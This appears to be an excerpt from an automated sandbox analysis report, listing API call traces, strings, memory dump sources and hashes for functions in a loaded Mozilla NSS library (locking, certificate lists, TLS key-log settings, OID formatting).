                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A158
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A175
                                                                                                                                                                                                                          • CERT_AddCertToListTail.NSS3(00000000,00000000), ref: 6C49A1A5
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49A1B2
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C49A1C6
                                                                                                                                                                                                                          • CERT_DestroyCertList.NSS3(00000000), ref: 6C49A1D6
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5,00000003,-00000004,00000000,?,6C48EAC5), ref: 6C4B5627
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B), ref: 6C4B564F
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PL_FreeArenaPool.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B5661
                                                                                                                                                                                                                            • Part of subcall function 6C4B55E0: PR_SetError.NSS3(FFFFE01A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C48EAC5), ref: 6C4B56AF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Arena$Pool$CallFreeOnce$CertErrorFinishList$CriticalDestroyEnterInitSectionUnlockUtilValue$Alloc_Arena_CertificateTailfree
                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                          • API String ID: 3250630715-3315324353
                                                                                                                                                                                                                          • Opcode ID: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                          • Instruction ID: 14c73738dbf2f440161eb4b6963cf378240da025ca7cdd97921979b09d103696
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82fb20c9bbb4804016864a766c1c997304b82320cdcded9c3637b517844bd5d6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2651E5B1D00319ABEB10DFA8DD45FAE7778EF4130DF110528E809AAB41E775A909C7E6
                                                                                                                                                                                                                          Function 6C4B4C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D4F
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4DB7
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B4DD7
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B4DEC
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B4E1B
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E2F
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4E5A
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B4E71
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B4E7A
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B4EA2
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B4EC1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B4ED6
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B4F01
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B4F2A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                                                          • Opcode ID: 2c046c59efbbf7f81926f08c9ff29be44e992d66801496969ec8f85c0da36279
                                                                                                                                                                                                                          • Instruction ID: ec85f4ea06bd91f589fc39cf979e1f75ffd5b12df85eda253c4edd044a33254a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c046c59efbbf7f81926f08c9ff29be44e992d66801496969ec8f85c0da36279
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6B10075A002059FEB01EF68DC44FAA77B4BF09359F055128ED15ABB01E730EA65CBE1
                                                                                                                                                                                                                          Function 6C4BFFB0 Relevance: 30.1, APIs: 20, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFB4
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFC6
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFD6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFE6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4BFFF6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0006
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0016
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0026
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0036
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0046
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0056
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0066
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0076
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0086
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C0096
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00A6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00B6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00C6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00D6
                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,?,6C4B76C8,?,?,?,?,?,?,?,?,00000000,00000000,?,6C4875C2,00000000), ref: 6C4C00E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Lock$CountCriticalErrorInitializeLastSectionSpincallocfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1407103528-0
                                                                                                                                                                                                                          • Opcode ID: 302e6992f06773e5d7025341ff11150cbfff8da63c33b9b7aacdf6fa18f6d96f
                                                                                                                                                                                                                          • Instruction ID: 2d1ffa3bc491ba0499827944e7cbd2953a946f40b2c36cb931db85f8d7026df9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 302e6992f06773e5d7025341ff11150cbfff8da63c33b9b7aacdf6fa18f6d96f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31E4F0E01724DE8B85DF25CD481897BB4B7D6A0A712611ADC1887701EBB42D4ACFDE
                                                                                                                                                                                                                          Function 6C506E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C506BF7), ref: 6C506EB6
                                                                                                                                                                                                                            • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                            • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                            • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                            • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C5AFC0A,6C506BF7), ref: 6C506ECD
                                                                                                                                                                                                                          • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C506EE0
                                                                                                                                                                                                                          • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(# SSL/TLS secrets log file, generated by NSS,0000002D,00000001), ref: 6C506EFC
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C506F04
                                                                                                                                                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C506F18
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLFORCELOCKS,6C506BF7), ref: 6C506F30
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_ENABLE_RENEGOTIATION,?,6C506BF7), ref: 6C506F54
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_REQUIRE_SAFE_NEGOTIATION,?,?,6C506BF7), ref: 6C506FE0
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_SSL_CBC_RANDOM_IV,?,?,?,6C506BF7), ref: 6C506FFD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • NSS_SSL_CBC_RANDOM_IV, xrefs: 6C506FF8
                                                                                                                                                                                                                          • SSLKEYLOGFILE, xrefs: 6C506EB1
                                                                                                                                                                                                                          • SSLFORCELOCKS, xrefs: 6C506F2B
                                                                                                                                                                                                                          • # SSL/TLS secrets log file, generated by NSS, xrefs: 6C506EF7
                                                                                                                                                                                                                          • NSS_SSL_REQUIRE_SAFE_NEGOTIATION, xrefs: 6C506FDB
                                                                                                                                                                                                                          • NSS_SSL_ENABLE_RENEGOTIATION, xrefs: 6C506F4F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Secure$CriticalEnterLockSectionUnlockValuefclosefopenftellfwritegetenv
                                                                                                                                                                                                                          • String ID: # SSL/TLS secrets log file, generated by NSS$NSS_SSL_CBC_RANDOM_IV$NSS_SSL_ENABLE_RENEGOTIATION$NSS_SSL_REQUIRE_SAFE_NEGOTIATION$SSLFORCELOCKS$SSLKEYLOGFILE
                                                                                                                                                                                                                          • API String ID: 412497378-2352201381
                                                                                                                                                                                                                          • Opcode ID: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                          • Instruction ID: f646a159f3b5f341656e229e154041c7b45ee7d81e1ade23ae18aad620b9811d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247c5aed71cb3664476af36d786226cc18cc9a8b31dbc6a32a1abb75d0856f58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88A12DB2B55E9187F7109A3CCC0178437B2ABD33A9F59476AEC31C7ED8DB75A4808249
                                                                                                                                                                                                                          Function 6C485DB0 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 238memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C485DEC
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C485E0F
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C485E35
                                                                                                                                                                                                                          • SECKEY_CopyPublicKey.NSS3(?), ref: 6C485E6A
                                                                                                                                                                                                                          • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C485EC3
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C485ED9
                                                                                                                                                                                                                          • SECKEY_SignatureLen.NSS3(?), ref: 6C485F09
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C485F49
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C485F89
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C485FA0
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C485FB6
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C485FBF
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C48600C
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C486079
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486084
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C486094
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                          • Opcode ID: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                          • Instruction ID: db78d8e9841570972076eacfd68ed77c1d9354c39d745715965fae66a80b9cc6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fe49594a336c0579bf9c0884c4cfe4fc3cf11d70488fb2550e0662188041684
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F281E3B1E022059BEB10CF68CC84FAE77B5AF44319F144128E91AA7B91E731E905CBE1
                                                                                                                                                                                                                          Function 6C45B860 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000144,?,?,?,?,?,6C45B45E,?,?,?,?,?,?,?,?), ref: 6C45B87D
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C45B8FE
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C45B912
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C45B959
                                                                                                                                                                                                                          • _PR_MD_UNLOCK.NSS3(?), ref: 6C45B977
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000002C), ref: 6C45B983
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3 ref: 6C45B9B9
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(-00000040,000005DC,?,?), ref: 6C45BA54
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C45BA5F
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C45BA77
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C45BA96
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45BA9D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C45BAB3
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C45BACD
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C45BAD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$free$DeleteErrorValuecalloc$CondCountEnterInitializeLastSpin
                                                                                                                                                                                                                          • String ID: T ]l$X ]l
                                                                                                                                                                                                                          • API String ID: 1841981668-1146210263
                                                                                                                                                                                                                          • Opcode ID: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                          • Instruction ID: f6867949943837ec95b402305c2d23edc9007851554a70aaa03fd70892c99291
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f5da456036ce2c5ff4e58ca311257d0f721d65bcc67c6ab6c63eff41684e70ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1051CBB4A007019FEB10DF29CC48F5A7BF4BF09309F41852DE85A86B41EB31E965CB99
                                                                                                                                                                                                                          Function 6C46F850 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 262COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE004,00000000), ref: 6C46F86F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%lu,?), ref: 6C46F899
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.%lu,00000000,?), ref: 6C46FA4E
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.%llu,00000000,00000000,00000000), ref: 6C46FAA2
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s.UNSUPPORTED,00000000), ref: 6C46FAB6
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C46FAC1
                                                                                                                                                                                                                          • PR_smprintf.NSS3(OID.UNSUPPORTED), ref: 6C46FAD3
                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C46FB00
                                                                                                                                                                                                                          • PR_smprintf.NSS3(OID.%llu.%llu,00000000,?,00000000,FFFFFFD8,00000000,00000000,00000028,00000000), ref: 6C46FB4B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
